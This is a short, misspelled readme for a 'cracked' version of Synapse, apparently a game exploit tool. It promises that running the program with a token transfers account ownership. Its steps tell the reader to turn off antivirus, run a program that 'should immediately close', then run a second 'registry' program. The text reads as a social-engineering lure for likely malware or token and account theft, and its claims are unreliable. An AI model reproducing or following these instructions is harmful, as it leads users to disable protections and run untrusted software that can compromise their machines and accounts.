Cracked Syanpse!

This is a cracked version of Synapse Cracked by me to transfer over ownership without you getting flagged by the real synapse

If you the person with the token just tell them to download this software and enter the token for ownership to be transfered

After this is done the real synapse will download and you will be in their account.



steps 


1. turn of anti virus  

2. run synapse cracked it should immediatly close

3. next run registry it will automaticly verify the program allowing it to bypass synapse flagging it

4. and your done if any problems dm the owner on discord


ps. if this was distibuted from someone out side of discord DO NOT RUN